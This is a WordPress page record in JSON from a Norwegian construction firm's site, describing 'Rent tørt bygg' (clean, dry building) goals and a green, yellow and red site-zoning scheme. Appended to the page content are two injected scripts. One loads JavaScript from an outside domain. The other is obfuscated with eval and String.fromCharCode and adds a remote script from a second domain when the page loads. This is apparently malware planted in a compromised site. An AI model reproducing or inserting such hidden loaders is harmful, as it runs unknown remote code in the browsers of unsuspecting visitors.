{"id":4255,"date":"2020-11-12T07:35:47","date_gmt":"2020-11-12T07:35:47","guid":{"rendered":"http:\/\/ms24.no\/?page_id=4255"},"modified":"2021-02-25T01:14:07","modified_gmt":"2021-02-25T01:14:07","slug":"rent-tort-bygg","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=4255","title":{"rendered":"Rent t\u00f8rt bygg"},"content":{"rendered":"<h2>Rent t\u00f8rt bygg<\/h2>\n<p>Rent t\u00f8rt bygg skal gi et godt inneklima i ferdige bygg, ved \u00e5 begrense bl.a. spredning av st\u00f8v og fibre fra byggeomr\u00e5det til bygningen.<br \/>RTB gir et bedre arbeidsmilj\u00f8, en sikrere og mer effektiv arbeidsplass for brukerne av bygget.<br \/>Rene og ryddige arbeidsplasser gir st\u00f8rre arbeidsglede, f\u00e6rre feil, mindre leting etter verkt\u00f8y og \u00f8kt arbeidseffektivitet.<\/p>\n<p style=\"text-align: center;\"><strong>RTB-FILOSOFIENS M\u00c5L<\/strong><\/p>\n<ul>\n<li>Arbeidsmilj\u00f8et p\u00e5 byggeplassen skal sikres mot personskader og helsefare<\/li>\n<li>Forurensninger og fukt fra byggeperioden skal ikke belaste inneklimaet i den ferdige bygningen<\/li>\n<li>Tiltak mot fukt skal hindre utvikling av sopp, mugg, bakterievekst og byggskader<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><strong>SONEINNDELING<\/strong><\/p>\n<p>Bygget deles inn i RTB-soner. Ettersom produksjonen skrider frem skifter sonene farge fra gr\u00f8nn til gul til r\u00f8d.<br \/><strong>Gr\u00f8nn sone:<\/strong><br \/>R\u00e5byggfasen<br \/><strong>Gul sone:<\/strong><br \/>Tett bygg med ferdige overflater (d\u00f8rer og vinduer montert)<br \/><strong>R\u00f8d sone:<\/strong><br \/>Tett bygg med ferdige overflater (gulvbelegg, malte flater, systemhimling\/fasthimling, listing etc.<\/p>\n<p>Vi har solid kompetanse og erfaring fra Rent T\u00f8rt Bygg.<\/p>\n<p><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Rent t\u00f8rt bygg Rent t\u00f8rt bygg skal gi et godt inneklima i ferdige bygg, ved \u00e5 begrense bl.a. spredning av st\u00f8v og fibre fra byggeomr\u00e5det til bygningen.RTB gir et bedre arbeidsmilj\u00f8, en sikrere og mer effektiv arbeidsplass for brukerne av bygget.Rene og ryddige arbeidsplasser gir st\u00f8rre arbeidsglede, f\u00e6rre feil, mindre leting etter verkt\u00f8y og \u00f8kt [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-4255","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4255","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4255"}],"version-history":[{"count":8,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4255\/revisions"}],"predecessor-version":[{"id":5134,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4255\/revisions\/5134"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4255"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}